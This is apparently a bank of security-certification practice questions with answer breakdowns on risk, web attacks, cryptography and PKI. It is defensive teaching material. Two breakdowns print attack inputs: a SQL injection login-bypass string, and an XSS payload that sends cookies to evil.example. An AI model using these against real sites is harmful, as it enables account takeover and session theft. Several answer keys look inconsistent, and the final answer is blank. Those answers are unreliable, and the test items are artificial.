Risk Reduction Strategies
What are the four strategies for reducing or removing risk from an organization? (Select four)
- Isolate
- Mitigate
- Assess
- Accept
- Educate
- Transfer
- Avoid
Show answer and Breakdown
Answer: The correct answer is 2, 4, 6, and 7.
Breakdown: How an organization reduces or removes risk is based on the threshold established for different risks and depends on the organization's risk tolerance. For any organization, there are four strategies for reducing or removing risk: Mitigate – reduce the risk to an acceptable level. Transfer – put the risk in someone else's hands, e.g., delegate it to a qualified third party such as an insurer. Accept – concede that incidents will eventually happen and accept the eventual cost. Avoid – cease the risky behavior.
CVSS Metric Groups
What are the three core CVSS metric groups?
- Information attribute group, vulnerability threat value, CIA attribute
- Base metric group, Vulnerability metric group, Environmental metric group
- Base metric group, Temporal metric group, Environmental metric group
- Base metric group, Integrity metric group, Threat metric group
Show answer and Breakdown
Answer: The correct answer is 3.
Breakdown: The Common Vulnerability Scoring System (CVSS) is a risk management approach for quantifying the severity of vulnerabilities, taking into account the degree of risk they pose to different types of systems or information. The three core metric groups of the system are the Base metric group, the Temporal metric group, and the Environmental metric group.
CIA Triad Definition
What are the three components of the CIA Triad? (Select three)
- Information
- Integrity
- Classification
- Confidentiality
- Assurance
- Clearance
- Availability
Show answer and Breakdown
Answer: The correct answer is 4, 2, and 7.
Breakdown: All organizational risks can be described by their threat to the confidentiality, integrity, or availability of an asset. Assets can be defined as hardware, data, or people.
Cost Benefit Analysis Basics
When performing a cost benefit analysis, what acronym is used to discuss all costs involved with a solution?
- MTTR
- TCO
- CVSS
- EOL
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: Total Cost of Ownership (TCO) is the metric that includes all costs involved with implementing and supporting a solution.
ROI Definition
What is ROI?
- Rate of Income
- Return on Investment
- Rate of Interoperability
- Random or Intentional
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: When performing a cost benefit analysis, it’s important to calculate your return on investment (ROI). ROI measures the benefit gained in relation to the amount of money being spent on a solution. This metric is important when presenting a new solution to the business.
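As a quick worked illustration (the figures below are hypothetical), ROI is commonly computed as net benefit divided by cost:

```python
# Hypothetical figures for illustration only.
solution_cost = 50_000    # total spend on the solution (hardware, licenses, labor)
annual_benefit = 80_000   # estimated value gained (losses avoided, time saved)

# ROI = (benefit - cost) / cost, usually expressed as a percentage.
roi = (annual_benefit - solution_cost) / solution_cost
print(f"ROI: {roi:.0%}")  # ROI: 60%
```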
Vulnerability Scanner Accuracy
True or false? A vulnerability scanner always finds all vulnerabilities on the network.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: A vulnerability scanner can find many unsuspected vulnerabilities on a network, however, it can’t be relied on to find all of them. There are many factors that can contribute to vulnerabilities going undetected.
Cracking HTTPS Traffic
True or false? A packet capture of HTTPS traffic can be read clearly in tools such as Wireshark.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: Wireshark is a full-featured network protocol analyzer that can capture and analyze communication sessions. Though it can reassemble SSL conversations, it requires the SSL private key to decrypt the stream.
Vulnerability Assessment Definition
Which of the following is the best description of a vulnerability assessment?
- Determining the threats to a network.
- Determining the impact each threat poses to a network.
- Determining the likelihood a given threat will be exploited.
- Determining the weaknesses in a network that could be exploited.
Show answer and Breakdown
Answer: The correct answer is 4.
Breakdown: A vulnerability assessment is an evaluation used to find security weaknesses within an organization’s technology. Assessments are usually carried out using automated vulnerability scanning tools.
Black Box Penetration Testing
What is the goal of black box penetration testing?
- To simulate a real external hacker or attacker.
- To simulate a user within the organization that has been bribed or coerced to disclose proprietary information.
- To simulate a malicious worm or virus.
- To simulate an attacker that has some knowledge of the organization and its infrastructure.
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: Black box penetration testing simulates an outside attacker who knows little about the systems or network being attacked. This is also called a zero-knowledge test, and it requires that the penetration tester gather all types of information about the target prior to starting the testing phase of the penetration test.
Automate Vulnerability Testing
Which of the following is an automated software testing auditing technique that provides invalid and unexpected inputs to the application to identify possible vulnerabilities?
- Black box testing
- White box testing
- Fuzzing
- Gray box testing
Show answer and Breakdown
Answer: The correct answer is 3.
Breakdown: Fuzzing is a black box testing technique that generates a wide range of unexpected input values to a system. Typically, an automated application is used for fuzz testing. Fuzzing can be invaluable in ensuring that the most likely exploitable vulnerabilities have been detected or identified.
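A minimal sketch of the idea, assuming a hypothetical `parse_record` function as the test target: generate random, possibly malformed inputs and watch for crashes.

```python
import random
import string

def parse_record(data: str):
    """Hypothetical target: a naive parser with unchecked assumptions."""
    name, age = data.split(",")   # assumes exactly one comma
    return name, int(age)         # assumes the second field is numeric

def random_input(max_len: int = 40) -> str:
    """Generate a random, possibly malformed, input string."""
    return "".join(random.choice(string.printable)
                   for _ in range(random.randint(0, max_len)))

# Feed unexpected inputs to the parser and report the first one that crashes it.
for _ in range(1000):
    sample = random_input()
    try:
        parse_record(sample)
    except Exception as exc:      # each crash is a lead worth investigating
        print(f"input {sample!r} raised {type(exc).__name__}")
        break
```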
Circumventing JavaScript Validation Exploits
Joey disables JavaScript in his web browser to circumvent the JavaScript validation checks being performed, allowing him to submit malformed data inputs into a web application. What type of controls is Joey circumventing by disabling JavaScript?
- Server-side controls
- Client-side controls
- Web application firewall controls
- SQL injection controls
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: Client-side data validation is performed by using a client-side scripting language such as JavaScript when the end user is filling in form data or before it is submitted to the web server. However, disabling client-side code is trivial and can be done by simply configuring the browser to disable JavaScript. The key point to remember is that client-side data cannot be controlled and therefore cannot be trusted.
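A brief sketch of the takeaway, with a hypothetical `validate_username` check: since client-side JavaScript can be disabled, the server must re-validate everything it receives.

```python
import re

def validate_username(value: str) -> str:
    """Server-side validation, applied even if JavaScript already checked it."""
    if not re.fullmatch(r"[A-Za-z0-9_]{3,20}", value):
        raise ValueError("invalid username")  # reject; never trust client input
    return value

validate_username("joey_99")                    # accepted
validate_username("<script>alert(1)</script>")  # raises ValueError
```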
Web Application Compromise
John supplies an apostrophe or single quotation mark in the password field to log into a web application he normally doesn’t have access to. What is this type of attack called?
- SQL Injection
- Cross-Site Request Forgery
- AJAX
- Session Prediction
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: A SQL injection exploit targets vulnerabilities in Web applications in order to gain unauthorized access to the backend database and its contents. The simplest and most common method for identifying possible SQL injection vulnerabilities is to submit a single apostrophe in an HTTP request and then look for errors. If an error is returned, the attacker will look to see if it provides him with SQL syntax details that can then be used to construct a more effective SQL injection query.
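A minimal sketch (using Python's built-in sqlite3 and a made-up users table) of why the apostrophe works, and how parameterized queries prevent it:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('john', 's3cret')")

attacker_input = "' OR '1'='1"  # the single-quote trick from the question

# Vulnerable: concatenation lets the quote rewrite the query's logic.
query = ("SELECT * FROM users WHERE name = 'john' "
         f"AND password = '{attacker_input}'")
print(conn.execute(query).fetchall())  # [('john', 's3cret')] -- bypassed!

# Safe: a parameterized query treats the input strictly as data.
rows = conn.execute("SELECT * FROM users WHERE name = ? AND password = ?",
                    ("john", attacker_input)).fetchall()
print(rows)  # [] -- the injection string is just a wrong password
```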
Privilege Escalation Exploits
Which of the following are examples of privilege escalation? (Choose all that apply)
- Mary uses a password cracking application to crack the admin password and login to the domain controller.
- Sam logs into his account and then exploits a local application to execute commands as root on a Linux server.
- Jimmy logs into his account and then takes over Christy’s account.
- Fred exploits a webmail application by tricking users to visit his web site that makes requests to the targeted user’s email preferences to modify the user’s email setting and forward all emails to Fred’s email account.
Show answer and Breakdown
Answer: The correct answer is 1 and 2.
Breakdown: Privilege escalation exploits occur when a user is able to obtain access to additional resources or functionality they are normally not allowed to access. One of the most common scenarios is when a normal user is able to exploit some vulnerability on a system to gain administrator or root-level privileges, as in choices 1 and 2 in the question above.
Buffer Overflow Exploit Prevention
Which of the following security measures would be the most effective against a buffer overflow exploit attack?
- Validating user inputs to remove special characters.
- Implementing strong encryption.
- Secure coding standards.
- Application layer firewall.
Show answer and Breakdown
Answer: The correct answer is 3.
Breakdown: The single most effective method for dealing with buffer overflow exploits is to implement secure coding standards. Developers can become complacent and feel that they have met the requirements as soon as the code they produce functions. Having rules and standards in place, along with proper audits – both automated and in the form of code reviews – is a step in the right direction toward writing more secure applications.
Cross-Site Scripting Attack Types
A malicious attacker submits Cross-site scripting (XSS) exploit code to an online web forum that is vulnerable to this attack. When unsuspecting users visit the malicious attacker’s forum posting, their session tokens are stolen and posted to the attacker’s server. Which of the following types of XSS attacks is the attacker performing?
- Cross-site Request Forgery (CSRF)
- Persistent Cross-site Scripting (XSS)
- Session Fixation
- Non-persistent Cross-site Scripting (XSS)
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: There are three major types of XSS vulnerabilities: Persistent, Non-Persistent, and DOM. The persistent variety occurs when data is provided by an end user to a web application and then stored persistently on the server as data in a database or other location. This data is then later displayed to users in a web page without being sanitized or validated as in online message boards where users are allowed to post HTML-formatted messages for others to read.
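A short sketch of the sanitization the breakdown calls for: escape stored input on output so a persistent payload becomes inert text. The payload and collection endpoint below are illustrative only.

```python
import html

# A persistent XSS payload an attacker might post to a vulnerable forum.
stored_post = '<script>new Image().src="//evil.example/?c="+document.cookie</script>'

# Rendered verbatim, the script runs in every visitor's browser.
unsafe = f"<div class='post'>{stored_post}</div>"

# Escaped on output, the same payload becomes harmless text.
safe = f"<div class='post'>{html.escape(stored_post)}</div>"
print(safe)
# <div class='post'>&lt;script&gt;new Image().src=&quot;//evil.example/?c=&quot;+document.cookie&lt;/script&gt;</div>
```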
Browser Exploits
Name the malicious attack technique used in the following scenario: A user visits a web site that offers a reaction speed test in which the user clicks a pop-up button several times to measure reaction speed. Unknown to the user, an eCommerce product web page is loaded hidden underneath the game, capturing these mouse clicks to indicate that the user “likes” different products on the site.
- Click-jacking
- Cross-site scripting
- Buffer overflow
- Cross-site request forgery
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: The scenario above is an example of click-jacking which is a cross-domain attack designed to hijack user-initiated mouse clicks in order to perform actions that the user did not intend and is not aware of.
Resource Exhaustion Exploits
Which of the following are examples of resource exhaustion exploits? (Choose all that apply)
- SYN Flooding a network.
- Allocating 100% of the system RAM to a single application.
- Smurf Attack.
- Submitting an integer value that is too large to be stored in the allocated variable type.
Show answer and Breakdown
Answer: The correct answer is 1, 2, and 3.
Breakdown: All of the above examples, with the exception of 4, are examples of resource exhaustion exploits. Example 4 will cause an integer overflow condition, which could potentially be used to gain control of an application as in other buffer overflow attacks. It may also cause invalid data to be entered into an application, which in turn could produce unexpected results.
SPML Automation
SPML is used to automate which process?
- Authentication
- Provisioning
- Certificate revocation handling
- Access control
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: Service Provisioning Markup Language (SPML) is an XML-based framework for automating and managing the provisioning of resources across networks and organizations. SPML allows for all of the assets assigned to an employee, department, sub-contractor, etc., to be tracked and managed.
SAML Assertions for Resource Access
True or false? SAML assertions by themselves allow for access to resources.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: Security Assertion Markup Language (SAML) is an XML-based standard for securely exchanging authentication-related data. One of the components of SAML is assertions, which are sets of authorization, attribute, and authentication data. Authentication provides information necessary to make a decision on allowing or disallowing access to a resource.
XACML Policies
XACML policies contain which of the following entities?
- PolicySet
- Policies
- Rules
- Resources
Show answer and Breakdown
Answer: The correct answer is 3.
Breakdown: XACML defines a three-level hierarchy used to grant permissions based on access controls. The first level is the PolicySet, which is a group of policies. Policies, in turn, are sets of rules that are used in conjunction with one another to define the permissions for a single action.
Certificate Based Authentication
True or false? Certificate based authentication allows for a user and his resources to be tracked throughout the organization to a single identity.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: Certificate based authentication generates digital certificates for each user and service within a network and then uses these certificates to authenticate actions, privileges, and requests. This authentication method provides a number of strong security properties. Every client can be assured of the server they are communicating with, and every server can be assured that they are dealing with a legitimate client.
Single Sign On Authentication
True or false? Single Sign On (SSO) allows multiple people to share an account after one of them authenticates with a service.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: SSO is an access control process that allows a single user to authenticate once and receive access to many resources. It has the advantage of allowing users to roam and have transparent access to multiple services. An example of SSO is Google's Gmail: a single login also grants access to the rest of Google's services.
Enterprise Service Bus Basics
True or false? An Enterprise Service Bus (ESB) is a methodology for designing and developing software applications in the form of interoperable services.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: An ESB is a software architecture model used for designing and implementing a communication framework between various applications usually found in a Service Oriented Architecture (SOA). The bus concept is very similar to that of a hardware system where messages are passed over the bus to various endpoints. It is designed to operate independently of the various endpoints within the architecture and endpoints can either be producers or consumers of the messages that are routed through the bus.
Layer 2 Switch Security
Which of the following is a security mechanism in connected network switches that enables switch ports on any switch that is connected to a switch trunk to deny access through the port based on the MAC address?
- Star
- Mesh
- Trunking security
- QoS
Show answer and Breakdown
Answer: The correct answer is 3.
Breakdown: Trunking security is a security mechanism in connected network switches that enables switch ports on any switch connected to the trunk to deny access through the port based on the MAC address of an offending device connected to the switch. In effect, a device can be completely blocked at the switch based on its MAC address. This prevents the device from propagating malicious traffic across the trunk and subsequently to other parts of the network.
Active Directory Service
Active Directory is Microsoft’s implementation of what directory service?
- LDAP
- DNSSEC
- PAN
- SSO
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: Active Directory is Microsoft’s Lightweight Directory Access Protocol (LDAP)-compatible directory implementation.
Quality of Service Techniques
Which of the following is the practice of prioritizing the flow of packets over the network in order to meet quality of service (QoS) requirements, speed up or delay particular packets, increase available bandwidth, or otherwise ensure network or protocol performance?
- Virtual Private Networking
- Traffic shaping
- Trunking
- Traffic encoding
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: As new applications are introduced into an enterprise, priorities for performance and accessibility may change. There are two common methods to control data flow security: traffic shaping and virtual circuits. Traffic shaping is the practice of prioritizing the flow of packets over the network in order to meet quality of service (QoS) requirements, speed up or delay particular packets, increase available bandwidth, or otherwise ensure network or protocol performance.
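A minimal sketch of one common traffic-shaping mechanism, a token bucket, which releases packets only as fast as tokens accumulate (the rates and sizes below are illustrative):

```python
import time

class TokenBucket:
    """Tokens accrue at a fixed rate; a packet may pass only if enough remain."""

    def __init__(self, rate: float, capacity: float):
        self.rate = rate            # tokens (bytes) added per second
        self.capacity = capacity    # maximum burst size in bytes
        self.tokens = capacity
        self.last = time.monotonic()

    def allow(self, packet_bytes: int) -> bool:
        now = time.monotonic()
        # Refill based on elapsed time, never exceeding the bucket's capacity.
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= packet_bytes:
            self.tokens -= packet_bytes
            return True
        return False                # shaped: queue, delay, or drop the packet

bucket = TokenBucket(rate=125_000, capacity=10_000)  # ~1 Mbit/s, 10 KB bursts
print(bucket.allow(1500))  # True: a 1500-byte packet fits within the burst budget
```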
Virtual Storage Security Concerns
What are some of the security concerns that must be addressed when utilizing virtual storage? (Choose all that apply)
- The storage provider may not be compliant with the industry standards of the organization.
- Data is stored in a physically separate location and is not under the physical control of the organization.
- An attacker could perform a denial of service attack that would halt access to your local network traffic.
- Data from your organization is stored with the data from other organizations, which could make forensic investigation and auditing difficult if not impossible.
Show answer and Breakdown
Answer: The correct answer is 1, 2, and 4.
Breakdown: Though virtual storage offers many advantages, not the least of which is lowered cost, there are several important security issues that need to be considered when using this kind of infrastructure. Compliance with industry standards associated with an organization is an issue that must be addressed. It’s advisable to only work with providers that are willing to be subjected to audits and security certification processes. In addition, data forensics and investigations are vastly more complicated and essentially impossible for a client to conduct on its own. It’s vital that the provider have a mechanism in place that supports these types of investigations. Perhaps the biggest area of concern with virtual storage, and the one that creates all these other issues, is the lack of physical control of an organization’s data. Again, working with a provider that supports maintenance and administrative services is key to making virtual storage a viable and effective solution for an enterprise.
iSCSI Security Implications
Which of the following are security implications of using iSCSI? (Choose all that apply)
- Data on an iSCSI network is not encrypted so other encryption methods like IPSec must be implemented.
- Storage area networks are generally small and therefore easily stolen so they should be kept in a secure location to prevent theft.
- Because iSCSI uses the same protocol as the rest of the network, it relies on network segmentation to prevent users from directly accessing the storage network.
- Storage data and regular network traffic pass over the exact same channel so an attacker could perform a denial of service attack to impact bandwidth.
Show answer and Breakdown
Answer: The correct answer is 1 and 3.
Breakdown: iSCSI is a compromise between traditional SCSI technology and advanced Fibre Channel technology. There are several security implications that must be considered when deploying iSCSI. Encryption should be implemented at higher layers of the OSI protocol stack, since iSCSI operates as a clear-text protocol that allows eavesdropping on transmitted data. An iSCSI SAN is not well isolated from the rest of the network, and a misconfigured network setup could make the SAN easily accessible from the regular network.
SAN Advantages
Which of the following are advantages of a Storage Area Network (SAN)? (Choose all that apply)
- Uses a single device to manage all data storage.
- Data can be stored over various types of media including tape drives and writable disk drives.
- Devices can easily be added to the storage network allowing for vast scalability.
- Segmented network that is difficult for a hacker to directly access.
Show answer and Breakdown
Answer: The correct answer is 2, 3, and 4.
Breakdown: One of the primary advantages of a SAN is scalability. You can attach a nearly unlimited number of hard drives or other storage media to increase its size. Since a SAN is its own private network, it is not directly accessible by an attacker thus making a direct attack on the SAN difficult.
Block-Level Storage Basics
Which of the following best describes block-level storage?
- Data is divided up and stored into blocks without any consideration for the actual file or file system itself.
- Files are stored and cataloged for quick retrieval.
- Files are stored on one single device and are not allowed to spread over multiple devices.
- All storage devices must be the same media type.
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: A Storage Area Network (SAN) uses block level data storage, which operates on the same principle as a typical hard drive. A SAN receives blocks of data from all of the systems that are using it and places them where it is most efficient. A single file from one server could have parts stored on a hard drive array, optical drive and tape drive all at the same time. Also like a hard drive, a SAN must be partitioned and formatted in order to be used.
Network Attached Storage Advantages
Which of the following are advantages of a Network Attached Storage (NAS) solution? (Choose all that apply)
- Speed
- Cost-effectiveness
- A single, dedicated purpose
- Ease of configuration
Show answer and Breakdown
Answer: The correct answer is 1, 2, 3, and 4.
Breakdown: NAS is designed with the single purpose of providing file storage, and as such, is relatively easy to configure and maintain, and is high-speed. NAS provides a comparatively low-cost solution for mass storage, which is ideal for smaller organizations with limited resources.
Virtual Desktop Infrastructure Advantages
True or false? Virtual Desktop Infrastructure (VDI) provides reduced downtime in the event of hardware failure.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: In VDI, a desktop operating system and applications are run inside VMs that are hosted on servers within the virtualization infrastructure. This model has several advantages with the primary ones being simplified desktop provisioning and administration and increased security due to centralization. Reduced downtime in the event of hardware failures is another advantage that is a result of centralization. Conversely, there is a greater risk of downtime and lost productivity in the event of network interruptions.
Rogue Hypervisor Attack
In which of the following types of attack does an attacker run a rogue hypervisor to gain complete control over the underlying host operating system?
- VM spoofing
- Privilege escalation
- Hyperjacking
- VM escape
Show answer and Breakdown
Answer: The correct answer is 3.
Breakdown: In hyperjacking, an attacker runs a rogue hypervisor to gain complete control over the underlying operating system and thereby likely control over any guest operating systems running within the environment.
Virtualization Components
Which virtualization component is used to divide one physical server into multiple isolated virtual servers?
- Bare metal
- Hypervisor
- Virtual NIC
- Application virtualization
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: A hypervisor is an additional layer of software that separates computing software from the hardware it runs on in a virtualized environment. The hypervisor increases the efficiency of hardware utilization by running multiple guest systems on a single host system, with each guest operating as an independent system; these guests are sometimes called virtual private servers.
Public Key Cryptography
An attacker has compromised the private key of Alice. Assuming the attacker then monitors the network traffic between Alice’s and Bob’s next conversation, what type(s) of data can he uncover? (Choose all that apply)
- Cleartext contents of messages Bob sends.
- Cleartext contents of messages Alice sends.
- Bob’s private key.
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: To send Alice an encrypted message, Bob encrypts it with Alice’s public key. Upon delivery, Alice uses her private key to decrypt the message. Thus, if an attacker has Alice’s private key – like Alice – he can see clear text versions of Bob’s messages to Alice.
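A sketch of the exchange using the third-party `cryptography` package (a library choice assumed here for illustration; the principle is the same for any RSA/OAEP implementation):

```python
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

# Alice's key pair: the public half is shared, the private half must stay secret.
alice_private = rsa.generate_private_key(public_exponent=65537, key_size=2048)
alice_public = alice_private.public_key()

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

# Bob encrypts with Alice's PUBLIC key...
ciphertext = alice_public.encrypt(b"meet at noon", oaep)

# ...so whoever holds Alice's PRIVATE key (here, the attacker too) can read it.
print(alice_private.decrypt(ciphertext, oaep))  # b'meet at noon'
```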
Preventing Replay Attacks
Which of the following is used to prevent replay attacks?
- Digital signatures
- Digital certificates
- Hashing
- Nonces
Show answer and Breakdown
Answer: The correct answer is 4.
Breakdown: A replay attack occurs when an active attacker monitors network traffic and later resends packets that were previously transmitted. If the replayed packets comprise transactional data, such as a credit card payment or bank account withdrawal, the consequences can be severe. To protect against replay attacks, many protocols include nonces, which are generally pseudo-randomly generated numbers included as part of the encrypted content. The server keeps track of all nonces and checks whether the current value matches any previously recorded one. Since a nonce should never repeat, this is a very effective defense against replay attacks.
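A toy sketch of the server-side bookkeeping described above (in real protocols the nonce is bound into the authenticated message, so an attacker cannot simply swap it out):

```python
import secrets

seen_nonces = set()

def new_nonce() -> str:
    """Sender attaches a fresh, unpredictable nonce to each transaction."""
    return secrets.token_hex(16)

def accept(nonce: str) -> bool:
    """Receiver rejects any nonce it has already recorded."""
    if nonce in seen_nonces:
        return False          # same nonce twice: a replayed packet
    seen_nonces.add(nonce)
    return True

nonce = new_nonce()
print(accept(nonce))  # True  -- the original transaction goes through
print(accept(nonce))  # False -- the attacker's replayed copy is refused
```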
MD5 Hash Security
True or false? MD5 is a secure hash function.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: The MD5 hash function was published in 1992, but a number of attacks against it have rendered it insecure. It is now considered broken and should not be used in new systems; existing implementations should transition away from it.
Secure Hash Function
A hash generated from a secure hash function can be used for which of the following purposes? (Choose all that apply)
- To recover the contents of the hashed data.
- To prove that data was not tampered with since creation of the hash.
- To provide a timeline of alterations to the data.
- To prove who generated the hash.
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: Hashes can be considered “digital fingerprints” of a unique sequence of data. A good hash function should never produce the same output (hash) for two different inputs, and because hashing is one-way, the original data cannot be recovered from the digest. Hashes can be used for several purposes: verifying hashed data, such as user passwords, without storing the plaintext; digital forensics, to prove that hashed data collections weren’t altered or tampered with subsequent to the hashing process; and maintaining a database of malware and virus signatures that is easy to compare against.
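A short illustration of the tamper-evidence use case with Python's standard hashlib (the sample data is made up):

```python
import hashlib

evidence = b"contents of the collected disk image"  # hypothetical data

# Record the digest -- the data's "digital fingerprint" -- at collection time.
baseline = hashlib.sha256(evidence).hexdigest()

# Later, re-hashing unchanged data reproduces the fingerprint exactly...
print(hashlib.sha256(evidence).hexdigest() == baseline)   # True

# ...while even a one-character alteration yields a completely different one.
tampered = b"contents of the collected disk image!"
print(hashlib.sha256(tampered).hexdigest() == baseline)   # False
```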
Certificate Authority Roles
A certificate authority (CA) can be used for which of the following purposes? (Choose all that apply)
- To validate good-standing certificates
- To validate revoked certificates
- To answer queries from a registration authority (RA)
- To prevent man-in-the-middle communications using keys registered with it
Show answer and Breakdown
Answer: The correct answer is 1, 2, and 4.
Breakdown: Digital certificates are an important part of PKI and are used to tie a public key to the identity of the certificate owner. The certificate authority (CA) is responsible for the generation and publication of these certificates. The CA is used to verify the authenticity of an entity’s public key as well as tie the key to its identity. The CA also maintains a list of revoked certificates (CRL), which clients can then request to verify a revoked certificate.
Encryption Key Algorithm Security
True or false? A good encryption key algorithm can remain secure even in the face of a badly generated random number.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: An encryption algorithm is only as strong as its random number generator. Many encryption algorithms have proven insecure due to weaknesses in their encryption keys.
Random Numbers and Entropy
True or false? Entropy is easy to gather as truly random data exists throughout RAM.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: True randomness is rare in the universe and virtually non-existent in a computer. Entropy gathering attempts to compensate for this by seeding a random number generator with unpredictable phenomena such as hardware noise. The contents of computer RAM are largely devoid of randomness, as much of the data it contains is regular and predictable.
Distinguishing Appropriate Cryptographic Tools and Techniques
Most companies have security-based products, or look for security-related opportunities, that will have a piece of cryptography at their core. This is something that should be manageable using basic cryptographic tools and techniques. Oftentimes expensive hardware and software must be replaced because the designs produced are not secure, so it is recommended to get the process right the first time to avoid the extra expense. This can be accomplished if there is a…
Show answer and Breakdown
Answer:
comprehensive understanding of the basic tools and techniques and how to exploit them. By knowing the scope of choices and understanding their intended uses and outcomes, you’ll be better at making decisions for your organization.
Cryptographic Applications and Proper Implementation
The critical points of what you need to know about cryptographic applications and proper implementation are as follows:
Show answer and Breakdown
Answer:
Application developers rely on security protocols to structure security services using cryptography. These protocols depend on cryptographic infrastructures, such as Kerberos or Public Key Infrastructure (PKI), to control and assign cryptographic keys. The Cryptographic Technology Group establishes and strengthens standards, test approaches, and guidelines for these essential elements in collaboration with international standards organizations, product developers, and Federal agencies. The Cryptographic Technology Group is also an integral part in the U.S. Federal Government’s PKI deployment activities.
Executing Advanced PKI Concepts
Public Key Infrastructure (PKI) is a set of hardware, software, personnel, policies, and methods required to create, manage, administer, implement, store, and revoke digital certificates. In cryptography, a PKI is a configuration that binds public keys with each user identity through the use of a certificate authority (CA). The user identity must be uniquely applied within each CA domain. The binding is formed in the registration and application process, and depending on the level of security the binding has, it may be executed by software at a CA, or under designated supervision. How is PKI binding authorized?
Show answer and Breakdown
Answer:
The Registration Authority (RA) authorizes this binding. For each user, the user identity, public key, their binding, validity conditions, and other attributes are rendered unforgeable in public key certificates issued by the CA. A trusted third party (TTP) can also serve as the certificate authority (CA). The term PKI is sometimes erroneously used to denote public key algorithms themselves, which don’t rely on the use of a CA.
Function of Certificate Authorities
What are the main functions of Certificate Authorities (CA)? How does the Registration Authority (RA) relate to Certificate Authorities?
Show answer and Breakdown
Answer:
The main function of the CA is to publish the key bound to a given user. This is achieved using the CA’s own key, so trust in the user key depends on the authenticity of the CA’s key. The Registration Authority (RA) is the mechanism that binds keys to users; the RA may or may not be separate from the CA. Depending on the security level of the binding, key-user binding is put in place by software or under human supervision.
Web of Trust Scheme
Explain what Web of Trust Scheme is and the role it plays in PKI:
Show answer and Breakdown
Answer:
Another approach to publicly authenticating public key information is the web of trust scheme, which uses self-signed certificates and third-party attestations of those certificates. The term “web of trust” does not imply a single web of trust or common point of trust, but rather several, possibly disconnected, webs of trust. PGP and GnuPG are examples of this. Because PGP and GnuPG use e-mail digital signatures for self-publication of public key information, it’s not difficult to implement one’s own web of trust. One advantage of the web of trust is its compatibility with a PKI CA trusted by all parties in a domain, which can guarantee certificates as a trusted introducer.
Temporary Certificates & Single Sign-On
Temporary Certificates and Single Sign-On:
What are temporary certificates? How do they relate to the single sign-on process?
Show answer and Breakdown
Answer:
Here a server functions as an online certificate authority within a single sign-on system. The single sign-on server issues digital certificates into the client system but never stores them. Users can run programs with such a temporary certificate, commonly an X.509-based certificate.
What is the Simple Public Key Infrastructure (SPKI)?
The simple public key infrastructure (SPKI) evolved from three independent attempts to resolve the complexities of X.509 and PGP’s web of trust. SPKI doesn’t involve public authentication of public key information, nor does it bind people to keys since the keys rather than users are trusted. SPKI does not use any notion of trust, as the verifier is also the issuer. This is called an “authorization loop” where authorization is essential to its design. The primary entities and functions of SPKI are as follows:
Show answer and Breakdown
Answer:
- CA
- RA
- Certificate repository
- Certificate revocation system
- Key backup and recovery system
- Automatic key update
- Management of key histories
- Cross-certification with other CAs
- Time stamping
- Client-side software
PKI supplies the following security services:
- Confidentiality
- Access control
- Integrity
- Authentication
- Nonrepudiation
Online Certificate Status Protocol (OCSP) vs Certificate Revocation Lists (CRL)
How does OCSP compare to and differ from CRLs?
Show answer and Breakdown
Answer:
Online Certificate Status Protocol (OCSP) is used for accessing the revocation status of an X.509 digital certificate. It is used to confirm the status of a certificate. It was developed as an alternative to certificate revocation lists (CRL). It offers more relevant information about a certificate’s revocation status. It removes the requirement for clients to retrieve the CRLs themselves, resulting in less network traffic with increased bandwidth management. It is specified in RFC 2560 and is on the Internet standards track.
Wildcard SSL Certificates
What are Wildcard SSL Certificates?
Show answer and Breakdown
Answer:
Wildcard SSL certificates allow users to secure a limitless number of subdomains on a domain name. Though this can be an advantage, there are also risks. Wildcard certificates are becoming cheaper and much more popular. Some providers offer an open-ended server license, so only one wildcard certificate is needed and you can use as many Web servers as required. Applying 30 different individual SSL certificates can be a complicated task, even with a managed PKI interface, and the process has to start all over again when it’s time for them to be renewed. A wildcard certificate is efficient in many situations.
Issuance to End Entities in PKI
Before detailing message formats and procedures, you first need to define the participants involved in PKI management and their interactions. Next, these functions are grouped in order to support the various identifiable types of end entities. The entities involved in PKI management are the end entity (i.e., the entity named in the subject field of a certificate) and the certification authority (i.e., the entity named in the issuer field of a certificate). A registration authority may also be involved in PKI management. What are the two main end entities in PKI management?
Show answer and Breakdown
Answer:
Users – Subjects and End Entities: “Subject” refers to the entity named in the subject field of a certificate; when you want to specify the tools and/or software used by the subject, the term “subject equipment” is applied. The term “end entity” (EE), rather than subject, is preferred in order to avoid confusion with the field name. Systems: A registration/certification request message has, as its PKIBody, a CertReqMessages data structure that describes the requested certificates. The message is used by active PKI entities that want to obtain additional certificates. The PKIBody may also be a certification request; this structure may be needed for certificate requests for signing key pairs when interoperation with legacy systems is required, but its use is not recommended except when absolutely necessary.
Wildcard Certificate Drawbacks
What are the main drawbacks, downsides or weaknesses of Wildcard Certificates?
Show answer and Breakdown
Answer:
